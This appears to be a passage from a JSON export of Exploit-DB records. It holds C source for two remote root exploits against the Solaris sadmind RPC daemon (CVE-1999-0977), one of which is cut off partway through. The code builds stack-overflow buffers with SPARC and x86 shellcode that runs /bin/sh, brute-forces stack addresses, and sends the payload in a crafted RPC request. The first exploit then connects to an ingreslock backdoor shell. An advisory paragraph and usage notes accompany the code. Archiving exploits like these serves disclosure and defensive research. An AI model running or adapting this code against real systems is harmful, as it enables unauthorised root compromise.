/tmp/.x;\";\r\n\r\nunsigned long int sp[] = { 0xefff9580, 0xefff9418, 0x080418ec, 0x08041798 };\r\n \r\n#define FRAMELEN1 608\r\n#define FRAMELEN2 4200\r\n\r\n#define NETMGT_PROG 100232\r\n#define NETMGT_VERS 10\r\n#define NETMGT_PROC_PING 0\r\n#define NETMGT_PROC_SERVICE 1\r\n\r\n#define NETMGT_UDP_PING_TIMEOUT 30\r\n#define NETMGT_UDP_PING_RETRY_TIMEOUT 5\r\n#define NETMGT_UDP_SERVICE_TIMEOUT 1\r\n#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2\r\n\r\n#define NETMGT_HEADER_TYPE 6\r\n#define NETMGT_ARG_INT 3\r\n#define NETMGT_ARG_STRING 9\r\n#define NETMGT_ENDOFARGS \"netmgt_endofargs\"\r\n\r\n#define FW_VERSION \"VERSION\"\r\n#define CLIENT_DOMAIN \"CLIENT_DOMAIN\"\r\n#define FENCE \"FENCE\"\r\n\r\nstruct nm_send_header {\r\n struct timeval timeval1;\r\n struct timeval timeval2;\r\n struct timeval timeval3;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n unsigned int uint5;\r\n struct in_addr inaddr1;\r\n struct in_addr inaddr2;\r\n unsigned long ulong1;\r\n unsigned long ulong2;\r\n struct in_addr inaddr3;\r\n unsigned long ulong3;\r\n unsigned long ulong4;\r\n unsigned long ulong5;\r\n struct timeval timeval4;\r\n unsigned int uint6;\r\n struct timeval timeval5;\r\n char *string1;\r\n char *string2;\r\n char *string3;\r\n unsigned int uint7;\r\n};\r\n\r\nstruct nm_send_arg_int {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n int int1;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct nm_send_arg_string {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct nm_send_footer {\r\n char *string1;\r\n};\r\n\r\nstruct nm_send {\r\n struct nm_send_header header;\r\n struct nm_send_arg_int version;\r\n struct nm_send_arg_string string;\r\n struct nm_send_arg_int fence;\r\n struct nm_send_footer footer;\r\n};\r\n\r\nstruct nm_reply {\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string1;\r\n};\r\n\r\nbool_t xdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)\r\n{\r\n char *addr;\r\n size_t size = sizeof(struct in_addr);\r\n\r\n if(!xdr_long(xdrs, &objp->timeval1.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval1.tv_usec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval2.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval2.tv_usec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval3.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval3.tv_usec))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint2))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint3))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint4))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint5))\r\n return (FALSE);\r\n addr = (char *) &objp->inaddr1.s_addr;\r\n if(!xdr_bytes(xdrs, &addr, &size, size))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong1))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong2))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong3))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong4))\r\n return (FALSE);\r\n if(!xdr_u_long(xdrs, &objp->ulong5))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval4.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval4.tv_usec))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint6))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval5.tv_sec))\r\n return (FALSE);\r\n if(!xdr_long(xdrs, &objp->timeval5.tv_usec))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string2))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string3))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint7))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)\r\n{\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint2))\r\n return (FALSE);\r\n if(!xdr_int(xdrs, &objp->int1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint3))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint4))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)\r\n{\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint2))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string2))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint3))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint4))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)\r\n{\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_send(XDR *xdrs, struct nm_send *objp)\r\n{\r\n if(!xdr_nm_send_header(xdrs, &objp->header))\r\n return (FALSE);\r\n if(!xdr_nm_send_arg_int(xdrs, &objp->version))\r\n return (FALSE);\r\n if(!xdr_nm_send_arg_string(xdrs, &objp->string))\r\n return (FALSE);\r\n if(!xdr_nm_send_arg_int(xdrs, &objp->fence))\r\n return (FALSE);\r\n if(!xdr_nm_send_footer(xdrs, &objp->footer))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t xdr_nm_reply(XDR *xdrs, struct nm_reply *objp)\r\n{\r\n if(!xdr_u_int(xdrs, &objp->uint1))\r\n return (FALSE);\r\n if(!xdr_u_int(xdrs, &objp->uint2))\r\n return (FALSE);\r\n if(!xdr_wrapstring(xdrs, &objp->string1))\r\n return (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nvoid usage(char *prog)\r\n{\r\n fprintf(stderr, \"usage: %s -t target -a arch [-s size]\", prog);\r\n fprintf(stderr, \" [-i increment] [-p]\\n\");\r\n fprintf(stderr, \"\\tarchitectures:\\n\");\r\n fprintf(stderr, \"\\t0 - Solaris SPARC 2.6\\n\");\r\n fprintf(stderr, \"\\t1 - Solaris SPARC 2.7 (7.0)\\n\");\r\n fprintf(stderr, \"\\t2 - Solaris x86 2.6\\n\");\r\n fprintf(stderr, \"\\t3 - Solaris x86 2.7 (7.0)\\n\\n\");\r\n\r\n exit(-1); \r\n}\r\n\r\nint exp(char *host, int arch, unsigned long int sp, int pinging)\r\n{\r\n CLIENT *cl;\r\n struct nm_send send;\r\n struct nm_reply reply;\r\n struct timeval tm;\r\n enum clnt_stat stat;\r\n int c, i, len, slen, clen, junk, a;\r\n char *cp, *buf;\r\n unsigned long int addr, fp;\r\n \r\n a = (int) arch / 2; \r\n buf = (char *) malloc(buflen[a] + 1);\r\n\r\n if(a)\r\n {\r\n /* Solaris x86 */\r\n memset(buf, nops[a], buflen[a]);\r\n junk = junks[arch - 2];\r\n junk &= 0xfffffffc;\r\n\r\n for (i = 0, cp = buf + alignment[a]; i < junk / 4; i++) \r\n {\r\n *cp++ = (sp >> 0) & 0xff;\r\n *cp++ = (sp >> 8) & 0xff;\r\n *cp++ = (sp >> 16) & 0xff;\r\n *cp++ = (sp >> 24) & 0xff;\r\n }\r\n\r\n addr = sp + offset[a];\r\n\r\n for (i = 0; i < addrlen[a] / 4; i++) \r\n {\r\n *cp++ = (addr >> 0) & 0xff;\r\n *cp++ = (addr >> 8) & 0xff;\r\n *cp++ = (addr >> 16) & 0xff;\r\n *cp++ = (addr >> 24) & 0xff;\r\n }\r\n\r\n slen = strlen(shellx86); \r\n clen = strlen(command);\r\n len = clen; \r\n len++; \r\n len = -len;\r\n shellx86[lens[a]+0] = (len >> 0) & 0xff;\r\n shellx86[lens[a]+1] = (len >> 8) & 0xff;\r\n shellx86[lens[a]+2] = (len >> 16) & 0xff;\r\n shellx86[lens[a]+3] = (len >> 24) & 0xff;\r\n cp = buf + buflen[a] - 1 - clen - slen;\r\n memcpy(cp, shellx86, slen); \r\n cp += slen;\r\n memcpy(cp, command, clen); \r\n cp += clen;\r\n *cp = '\\xff';\r\n }\r\n else\r\n {\r\n /* Solaris SPARC */\r\n memset(buf, '\\xff', buflen[a]);\r\n fp = sp + FRAMELEN1 + FRAMELEN2;\r\n fp &= 0xfffffff8;\r\n addr = sp + offset[a];\r\n addr &= 0xfffffffc;\r\n\r\n for(i = 0, cp = buf + alignment[a]; i < addrlen[a] / 8; i++)\r\n {\r\n *cp++ = (fp >> 24) & 0xff;\r\n *cp++ = (fp >> 16) & 0xff;\r\n *cp++ = (fp >> 8) & 0xff;\r\n *cp++ = (fp >> 0) & 0xff;\r\n *cp++ = (addr >> 24) & 0xff;\r\n *cp++ = (addr >> 16) & 0xff;\r\n *cp++ = (addr >> 8) & 0xff;\r\n *cp++ = (addr >> 0) & 0xff;\r\n }\r\n \r\n slen = strlen(shellsparc);\r\n clen = strlen(command);\r\n len = buflen[a] - 1 - clen - slen - addrlen[a] - alignment[a];\r\n len &= 0xfffffffc;\r\n for(i = 0; i < lens[a] / 4; i++)\r\n {\r\n *cp++ = (nops[a] >> 24) & 0xff;\r\n *cp++ = (nops[a] >> 16) & 0xff;\r\n *cp++ = (nops[a] >> 8) & 0xff;\r\n *cp++ = (nops[a] >> 0) & 0xff;\r\n }\r\n len = clen;\r\n len++;\r\n len = -len;\r\n shellsparc[lens[a]+0] = (len >> 24) & 0xff;\r\n shellsparc[lens[a]+1] = (len >> 16) & 0xff;\r\n shellsparc[lens[a]+2] = (len >> 8) & 0xff;\r\n shellsparc[lens[a]+3] = (len >> 0) & 0xff;\r\n memcpy(cp, shellsparc, slen);\r\n cp += slen;\r\n memcpy(cp, command, clen);\r\n }\r\n\r\n buf[buflen[a]] = '\\0';\r\n memset(&send, 0, sizeof(struct nm_send));\r\n send.header.uint2 = NETMGT_HEADER_TYPE;\r\n send.header.string1 = \"\";\r\n send.header.string2 = \"\";\r\n send.header.string3 = \"\";\r\n send.header.uint7 =\r\n strlen(FW_VERSION) + 1 +\r\n (4 * sizeof(unsigned int)) + sizeof(int) +\r\n strlen(CLIENT_DOMAIN) + 1 +\r\n (4 * sizeof(unsigned int)) + strlen(buf) + 1 +\r\n strlen(FENCE) + 1 +\r\n (4 * sizeof(unsigned int)) + sizeof(int) +\r\n strlen(NETMGT_ENDOFARGS) + 1;\r\n send.version.string1 = FW_VERSION;\r\n send.version.uint1 = NETMGT_ARG_INT;\r\n send.version.uint2 = sizeof(int);\r\n send.version.int1 = 1;\r\n send.string.string1 = CLIENT_DOMAIN;\r\n send.string.uint1 = NETMGT_ARG_STRING;\r\n send.string.uint2 = strlen(buf);\r\n send.string.string2 = buf;\r\n send.fence.string1 = FENCE;\r\n send.fence.uint1 = NETMGT_ARG_INT;\r\n send.fence.uint2 = sizeof(int);\r\n send.fence.int1 = 666;\r\n send.footer.string1 = NETMGT_ENDOFARGS;\r\n cl = clnt_create(host, NETMGT_PROG, NETMGT_VERS, \"udp\");\r\n\r\n if (cl == NULL) \r\n {\r\n clnt_pcreateerror(\"clnt_create\");\r\n return 0;\r\n }\r\n\r\n cl->cl_auth = authunix_create(\"localhost\", 0, 0, 0, NULL);\r\n\r\n if (!pinging) \r\n {\r\n tm.tv_sec = NETMGT_UDP_SERVICE_TIMEOUT; \r\n tm.tv_usec = 0;\r\n\r\n if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) \r\n {\r\n fprintf(stderr, \"unable to set timeout\\n\");\r\n exit(1);\r\n }\r\n\r\n tm.tv_sec = NETMGT_UDP_SERVICE_RETRY_TIMEOUT; \r\n tm.tv_usec = 0;\r\n\r\n if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) \r\n {\r\n fprintf(stderr, \"unable to set timeout\\n\");\r\n exit(1);\r\n }\r\n\r\n stat = clnt_call(cl, NETMGT_PROC_SERVICE,\r\n xdr_nm_send, (caddr_t) &send,\r\n xdr_nm_reply, (caddr_t) &reply, tm);\r\n\r\n if (stat != RPC_SUCCESS) \r\n {\r\n clnt_perror(cl, \"clnt_call\");\r\n fprintf(stdout, \"now check if exploit worked;\\n\");\r\n return 0;\r\n }\r\n\r\n fprintf(stderr, \"exploit failed; \"\r\n \"RPC succeeded and returned { %u, %u, \\\"%s\\\" }\\n\",\r\n reply.uint1, reply.uint2, reply.string1);\r\n clnt_destroy(cl);\r\n exit(1);\r\n } \r\n else \r\n {\r\n\r\n tm.tv_sec = NETMGT_UDP_PING_TIMEOUT; \r\n tm.tv_usec = 0;\r\n\r\n if (!clnt_control(cl, CLSET_TIMEOUT, (char *) &tm)) \r\n {\r\n fprintf(stderr, \"unable to set timeout\\n\");\r\n exit(1);\r\n }\r\n\r\n tm.tv_sec = NETMGT_UDP_PING_RETRY_TIMEOUT; \r\n tm.tv_usec = 0;\r\n\r\n if (!clnt_control(cl, CLSET_RETRY_TIMEOUT, (char *) &tm)) \r\n {\r\n fprintf(stderr, \"unable to set timeout\\n\");\r\n exit(1);\r\n }\r\n\r\n stat = clnt_call(cl, NETMGT_PROC_PING,\r\n xdr_void, NULL,\r\n xdr_void, NULL, tm);\r\n\r\n if (stat != RPC_SUCCESS) \r\n {\r\n clnt_perror(cl, \"clnt_call\");\r\n exit(1);\r\n }\r\n\r\n clnt_destroy(cl);\r\n return 0;\r\n }\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n int i, arch;\r\n char *host = \"\";\r\n int pinging = 0, inc = 4, size = 2048;\r\n unsigned long int addr;\r\n\r\n for(i=0;i<argc;i++)\r\n {\r\n if(!strcmp(argv[i], \"-t\"))\r\n host = argv[i+1]; \r\n if(!strcmp(argv[i], \"-a\"))\r\n arch = atoi(argv[i+1]);\r\n if(!strcmp(argv[i], \"-i\"))\r\n inc = atoi(argv[i+1]);\r\n if(!strcmp(argv[i], \"-s\"))\r\n size = atoi(argv[i+1]); \r\n if(!strcmp(argv[i], \"-p\"))\r\n pinging = 1;\r\n }\r\n\r\n if(arch > 3 || arch < 0)\r\n usage(argv[0]);\r\n if(size < 0)\r\n usage(argv[0]);\r\n if(inc < 0)\r\n usage(argv[0]);\r\n\r\n for(i = 0; i < size; i+=inc)\r\n {\r\n addr = sp[arch] + i;\r\n exp(host, arch, addr, pinging); \r\n addr = sp[arch] - i;\r\n exp(host, arch, addr, pinging);\r\n }\r\n\r\n execl(\"telnet\", host, \"ingreslock\");\r\n return 0;\r\n}\r\n\n\n// milw0rm.com [2000-12-01]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/213/"}, {"lastseen": "2016-02-02T12:24:35", "description": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability (1). CVE-1999-0977. Remote exploit for solaris platform", "published": "1999-06-24T00:00:00", "type": "exploitdb", "title": "Solaris 2.5/2.5.1/2.6/7.0 sadmind Buffer Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0977"], "modified": "1999-06-24T00:00:00", "id": "EDB-ID:19668", "href": "https://www.exploit-db.com/exploits/19668/", "sourceData": "source: http://www.securityfocus.com/bid/866/info\r\n\r\nCertain versions of Solaris ship with a version of sadmind which is vulnerable to a remotely exploitable buffer overflow attack. sadmind is the daemon used by Solstice AdminSuite applications to perform distributed system administration operations such as adding users. The sadmind daemon is started automatically by the inetd daemon whenever a request to invoke an operation is received.\r\n\r\nUnder vulnerable versions of sadmind (2.6 and 7.0 have been tested), if a long buffer is passed to a NETMGT_PROC_SERVICE request (called via clnt_call()), it is possible to overwrite the stack pointer and execute arbitrary code. The actual buffer in questions appears to hold the client's domain name. The overflow in sadmind takes place in the get_auth() function, part of the /usr/snadm/lib/libmagt.so.2 library. Because sadmind runs as root any code launched as a result will run as with root privileges, therefore resulting in a root compromise. \r\n\r\n/**\r\n*** sadmindex - SPARC Solaris remote root exploit for /usr/sbin/sadmind\r\n***\r\n*** Tested and confirmed under Solaris 2.6 and 7.0 (SPARC)\r\n***\r\n*** Usage: % sadmindex -h hostname -c command -s sp [-o offset] \\\r\n*** [-a alignment] [-p]\r\n***\r\n*** where hostname is the hostname of the machine running the vulnerable\r\n*** system administration daemon, command is the command to run as root\r\n*** on the vulnerable machine, sp is the %sp stack pointer value, offset\r\n*** is the number of bytes to add to sp to calculate the desired return\r\n*** address, and alignment is the number of bytes needed to correctly\r\n*** align the contents of the exploit buffer.\r\n***\r\n*** If run with a -p option, the exploit will only \"ping\" sadmind on the\r\n*** remote machine to start it running. The daemon will be otherwise\r\n*** untouched. Since pinging the daemon does not require an exploit\r\n*** buffer to be constructed, you can safely omit the -c and -s options\r\n*** if you use -p.\r\n***\r\n*** When specifying a command, be sure to pass it to the exploit as a\r\n*** single argument, namely enclose the command string in quotes if it\r\n*** contains spaces or other special shell delimiter characters. The\r\n*** exploit will pass this string without modification to /bin/sh -c on\r\n*** the remote machine, so any normally allowed Bourne shell syntax is\r\n*** also allowed in the command string. The command string and the\r\n*** assembly code to run it must fit inside a buffer of 512 bytes, so\r\n*** the command string has a maximum length of about 380 bytes or so.\r\n***\r\n*** Due to the nature of the target overflow in sadmind, the exploit is\r\n*** extremely sensitive to the %sp stack pointer value that is provided\r\n*** when the exploit is run. The %sp stack pointer must be specified\r\n*** with the exact required value, leaving no room for error. I have\r\n*** provided confirmed values for Solaris running on a Sun SPARCengine\r\n*** Ultra AXi machine running Solaris 2.6 5/98 and on a SPARCstation 1\r\n*** running Solaris 7.0 10/98. On each system, sadmind was started from\r\n*** an instance of inetd that was started at boot time by init. There\r\n*** is a strong possibility that the demonstration values will not work\r\n*** due to differing sets of environment variables, for example if the\r\n*** the running inetd on the remote machine was started manually from an\r\n*** interactive shell. If you find that the sample value for %sp does\r\n*** not work, try adjusting the value by -2048 to 2048 from the sample in\r\n*** increments of 8 for starters. The offset parameter and the alignment\r\n*** parameter have default values that will be used if no overriding\r\n*** values are specified on the command line. The default values should\r\n*** be suitable and it will not likely be necessary to override them.\r\n***\r\n*** Demonstration values for SPARC Solaris:\r\n***\r\n*** (2.6) sadmindex -h host.example.com -c \"touch HEH\" -s 0xefff9580\r\n*** (7.0) sadmindex -h host.example.com -c \"touch HEH\" -s 0xefff9418\r\n***\r\n*** THIS CODE FOR EDUCATIONAL USE ONLY IN AN ETHICAL MANNER\r\n***\r\n*** Cheez Whiz\r\n*** cheezbeast@hotmail.com\r\n***\r\n*** June 24, 1999\r\n**/\r\n\r\n#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <rpc/rpc.h>\r\n\r\n#define NETMGT_PROG 100232\r\n#define NETMGT_VERS 10\r\n#define NETMGT_PROC_PING 0\r\n#define NETMGT_PROC_SERVICE 1\r\n\r\n#define NETMGT_UDP_PING_TIMEOUT 30\r\n#define NETMGT_UDP_PING_RETRY_TIMEOUT 5\r\n#define NETMGT_UDP_SERVICE_TIMEOUT 1\r\n#define NETMGT_UDP_SERVICE_RETRY_TIMEOUT 2\r\n\r\n#define NETMGT_HEADER_TYPE 6\r\n#define NETMGT_ARG_INT 3\r\n#define NETMGT_ARG_STRING 9\r\n#define NETMGT_ENDOFARGS \"netmgt_endofargs\"\r\n\r\n#define ADM_FW_VERSION \"ADM_FW_VERSION\"\r\n#define ADM_CLIENT_DOMAIN \"ADM_CLIENT_DOMAIN\"\r\n#define ADM_FENCE \"ADM_FENCE\"\r\n\r\n#define BUFLEN 1076\t\t/* 256+256+32+32+512-12 */\r\n#define ADDRLEN 560\t\t/* 256+256+32+32-4-12 */\r\n#define FRAMELEN1 608\r\n#define FRAMELEN2 4200\r\n#define LEN 84\r\n\r\n#define OFFSET 688\t\t/* default offset */\r\n#define ALIGNMENT 4\t\t/* default alignment */\r\n\r\n#define NOP 0x801bc00f\t\t/* xor %o7,%o7,%g0 */\r\n\r\nchar shell[] =\r\n/* 0 */ \"\\x20\\xbf\\xff\\xff\" /* bn,a ? */\r\n/* skip: */\r\n/* 4 */ \"\\x20\\xbf\\xff\\xff\" /* bn,a ? */\r\n/* 8 */ \"\\x7f\\xff\\xff\\xff\" /* call skip */\r\n/* execve: */\r\n/* 12 */ \"\\x90\\x03\\xe0\\x5c\" /* add %o7,92,%o0 */\r\n/* 16 */ \"\\x92\\x22\\x20\\x10\" /* sub %o0,16,%o1 */\r\n/* 20 */ \"\\x94\\x1b\\xc0\\x0f\" /* xor %o7,%o7,%o2 */\r\n/* 24 */ \"\\xec\\x02\\x3f\\xf0\" /* ld [%o0-16],%l6 */\r\n/* 28 */ \"\\xac\\x22\\x80\\x16\" /* sub %o2,%l6,%l6 */\r\n/* 32 */ \"\\xae\\x02\\x60\\x10\" /* add %o1,16,%l7 */\r\n/* 36 */ \"\\xee\\x22\\x3f\\xf0\" /* st %l7,[%o0-16] */\r\n/* 40 */ \"\\xae\\x05\\xe0\\x08\" /* add %l7,8,%l7 */\r\n/* 44 */ \"\\xc0\\x2d\\xff\\xff\" /* stb %g0,[%l7-1] */\r\n/* 48 */ \"\\xee\\x22\\x3f\\xf4\" /* st %l7,[%o0-12] */\r\n/* 52 */ \"\\xae\\x05\\xe0\\x03\" /* add %l7,3,%l7 */\r\n/* 56 */ \"\\xc0\\x2d\\xff\\xff\" /* stb %g0,[%l7-1] */\r\n/* 60 */ \"\\xee\\x22\\x3f\\xf8\" /* st %l7,[%o0-8] */\r\n/* 64 */ \"\\xae\\x05\\xc0\\x16\" /* add %l7,%l6,%l7 */\r\n/* 68 */ \"\\xc0\\x2d\\xff\\xff\" /* stb %g0,[%l7-1] */\r\n/* 72 */ \"\\xc0\\x22\\x3f\\xfc\" /* st %g0,[%o0-4] */\r\n/* 76 */ \"\\x82\\x10\\x20\\x3b\" /* mov 59,%g1 */\r\n/* 80 */ \"\\x91\\xd0\\x20\\x08\" /* ta 8 */\r\n/* data: */\r\n/* 84 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 88 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 92 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 96 */ \"\\xff\\xff\\xff\\xff\" /* DATA */\r\n/* 100 */ \"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\" /* DATA */\r\n/* 108 */ \"\\x2d\\x63\\xff\"; /* DATA */\r\n\r\nextern char *optarg;\r\n\r\nstruct nm_send_header {\r\n struct timeval timeval1;\r\n struct timeval timeval2;\r\n struct timeval timeval3;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n unsigned int uint5;\r\n struct in_addr inaddr1;\r\n struct in_addr inaddr2;\r\n unsigned long ulong1;\r\n unsigned long ulong2;\r\n struct in_addr inaddr3;\r\n unsigned long ulong3;\r\n unsigned long ulong4;\r\n unsigned long ulong5;\r\n struct timeval timeval4;\r\n unsigned int uint6;\r\n struct timeval timeval5;\r\n char *string1;\r\n char *string2;\r\n char *string3;\r\n unsigned int uint7;\r\n};\r\n\r\nstruct nm_send_arg_int {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n int int1;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct nm_send_arg_string {\r\n char *string1;\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string2;\r\n unsigned int uint3;\r\n unsigned int uint4;\r\n};\r\n\r\nstruct nm_send_footer {\r\n char *string1;\r\n};\r\n\r\nstruct nm_send {\r\n struct nm_send_header header;\r\n struct nm_send_arg_int version;\r\n struct nm_send_arg_string string;\r\n struct nm_send_arg_int fence;\r\n struct nm_send_footer footer;\r\n};\r\n\r\nstruct nm_reply {\r\n unsigned int uint1;\r\n unsigned int uint2;\r\n char *string1;\r\n};\r\n\r\nbool_t\r\nxdr_nm_send_header(XDR *xdrs, struct nm_send_header *objp)\r\n{\r\n char *addr;\r\n size_t size = sizeof(struct in_addr);\r\n\r\n if (!xdr_long(xdrs, &objp->timeval1.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval1.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval2.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval2.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval3.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval3.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint4))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint5))\r\n\treturn (FALSE);\r\n addr = (char *) &objp->inaddr1.s_addr;\r\n if (!xdr_bytes(xdrs, &addr, &size, size))\r\n\treturn (FALSE);\r\n addr = (char *) &objp->inaddr2.s_addr;\r\n if (!xdr_bytes(xdrs, &addr, &size, size))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong1))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong2))\r\n\treturn (FALSE);\r\n addr = (char *) &objp->inaddr3.s_addr;\r\n if (!xdr_bytes(xdrs, &addr, &size, size))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong3))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong4))\r\n\treturn (FALSE);\r\n if (!xdr_u_long(xdrs, &objp->ulong5))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval4.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval4.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint6))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval5.tv_sec))\r\n\treturn (FALSE);\r\n if (!xdr_long(xdrs, &objp->timeval5.tv_usec))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string2))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint7))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send_arg_int(XDR *xdrs, struct nm_send_arg_int *objp)\r\n{\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_int(xdrs, &objp->int1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint4))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send_arg_string(XDR *xdrs, struct nm_send_arg_string *objp)\r\n{\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint1))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint2))\r\n\treturn (FALSE);\r\n if (!xdr_wrapstring(xdrs, &objp->string2))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint3))\r\n\treturn (FALSE);\r\n if (!xdr_u_int(xdrs, &objp->uint4))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send_footer(XDR *xdrs, struct nm_send_footer *objp)\r\n{\r\n if (!xdr_wrapstring(xdrs, &objp->string1))\r\n\treturn (FALSE);\r\n return (TRUE);\r\n}\r\n\r\nbool_t\r\nxdr_nm_send(XDR *xdrs, struct nm_send *objp)\r\n{\r\n if (!xdr_nm_send_header(xdrs, &objp->header))\r\n\treturn (FALSE);\r\n if (!xdr_nm_send_arg_int(xdrs, 